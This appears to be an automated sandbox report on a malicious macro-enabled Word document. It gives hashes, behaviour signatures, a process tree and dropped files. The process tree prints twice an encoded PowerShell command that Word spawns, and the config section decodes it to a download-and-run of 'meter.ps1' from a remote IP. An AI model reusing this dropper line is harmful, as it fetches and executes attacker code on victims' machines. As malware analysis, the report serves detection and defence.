Analysis

  • max time kernel
    103s
  • max time network
    33s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    11-06-2023 10:17

General

  • Target

    bcdf20e65445ed6bda794d958025e417.docm

  • Size

    16KB

  • MD5

    bcdf20e65445ed6bda794d958025e417

  • SHA1

    6f3f1523627525c8efbb5bfe3e2f612d96801bef

  • SHA256

    332221ec47c7a4dd0296890e05e5c6647993dd1efdb139151e914e7cf22f9e65

  • SHA512

    9769842c9899b9ed2804a4390c40484908813035ca47f7b7ed6a7021337a91701b9daf9efb6ff94730d0b91f45fdd53631b3ac16e5cf1525008bedcfb5ac6210

  • SSDEEP

    384:/iutorSBqsqFxtJsUvWNxt/ZtNNkvJWObKo1nldRN:/XsUyFDJsUv8xllNkvPbKo1fD

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://192.168.45.161:8081/meter.ps1

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\bcdf20e65445ed6bda794d958025e417.docm"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1740
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADEANgAxADoAOAAwADgAMQAvAG0AZQB0AGUAcgAuAHAAcwAxACcAKQAgAHwAIABJAEUAWAA=
      2⤵
      • Process spawned unexpected child process
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1444
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADEANgAxADoAOAAwADgAMQAvAG0AZQB0AGUAcgAuAHAAcwAxACcAKQAgAHwAIABJAEUAWAA=
      2⤵
      • Process spawned unexpected child process
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:772
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:860

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      20KB

      MD5

      c70c3119f688c10c4fa3767ef29e40fe

      SHA1

      f144a43d89ed725a4eabffa6901a703267419f67

      SHA256

      003cecf21b0adf8a8c00cd389449a2747fac1a9801b66c11043705c35654b5d1

      SHA512

      775c271e3073f51ecc2d9deb3221e4066e4f799cba3d408e741cc9d1254c35d80eda178f9b070309e5d97400a7b0c9bc1fbd18554890ba8cb95aecc6fdb01a45

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4GDH1WGVZV7JSVVF250Q.temp
      Filesize

      7KB

      MD5

      c9abc0ccab99c28001d8fca77fb136cf

      SHA1

      6eb545e2b15718058b1c0f168fa820aac44fb406

      SHA256

      1d32516c1e3496e7b134774709164c877faa71f3914df537e9b29feff65606fa

      SHA512

      cbc9630c86fb9547ae3c2e8b6afb6265b8120b53864f2cb69000e118fe1666409903b58f5368ec8b49fdea7abaa0a0dc4b381c224e172b15f5f5f87125dd406f

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
      Filesize

      7KB

      MD5

      c9abc0ccab99c28001d8fca77fb136cf

      SHA1

      6eb545e2b15718058b1c0f168fa820aac44fb406

      SHA256

      1d32516c1e3496e7b134774709164c877faa71f3914df537e9b29feff65606fa

      SHA512

      cbc9630c86fb9547ae3c2e8b6afb6265b8120b53864f2cb69000e118fe1666409903b58f5368ec8b49fdea7abaa0a0dc4b381c224e172b15f5f5f87125dd406f

    • memory/772-86-0x0000000002320000-0x0000000002360000-memory.dmp
      Filesize

      256KB

    • memory/772-90-0x0000000002320000-0x0000000002360000-memory.dmp
      Filesize

      256KB

    • memory/772-88-0x0000000002320000-0x0000000002360000-memory.dmp
      Filesize

      256KB

    • memory/772-78-0x0000000002320000-0x0000000002360000-memory.dmp
      Filesize

      256KB

    • memory/1444-87-0x0000000002640000-0x0000000002680000-memory.dmp
      Filesize

      256KB

    • memory/1444-81-0x0000000002640000-0x0000000002680000-memory.dmp
      Filesize

      256KB

    • memory/1444-79-0x0000000002640000-0x0000000002680000-memory.dmp
      Filesize

      256KB

    • memory/1444-80-0x0000000002640000-0x0000000002680000-memory.dmp
      Filesize

      256KB

    • memory/1444-89-0x0000000002640000-0x0000000002680000-memory.dmp
      Filesize

      256KB

    • memory/1444-91-0x0000000002640000-0x0000000002680000-memory.dmp
      Filesize

      256KB

    • memory/1740-62-0x00000000006D0000-0x00000000007D0000-memory.dmp
      Filesize

      1024KB

    • memory/1740-54-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1740-67-0x00000000006D0000-0x00000000007D0000-memory.dmp
      Filesize

      1024KB

    • memory/1740-66-0x00000000006D0000-0x00000000007D0000-memory.dmp
      Filesize

      1024KB

    • memory/1740-64-0x00000000006D0000-0x00000000007D0000-memory.dmp
      Filesize

      1024KB

    • memory/1740-65-0x00000000006D0000-0x00000000007D0000-memory.dmp
      Filesize

      1024KB

    • memory/1740-63-0x00000000006D0000-0x00000000007D0000-memory.dmp
      Filesize

      1024KB

    • memory/1740-68-0x00000000006D0000-0x00000000007D0000-memory.dmp
      Filesize

      1024KB

    • memory/1740-61-0x00000000006D0000-0x00000000007D0000-memory.dmp
      Filesize

      1024KB

    • memory/1740-60-0x00000000006D0000-0x00000000007D0000-memory.dmp
      Filesize

      1024KB

    • memory/1740-58-0x00000000006D0000-0x00000000007D0000-memory.dmp
      Filesize

      1024KB

    • memory/1740-59-0x00000000006D0000-0x00000000007D0000-memory.dmp
      Filesize

      1024KB

    • memory/1740-57-0x00000000006D0000-0x00000000007D0000-memory.dmp
      Filesize

      1024KB

    • memory/1740-109-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB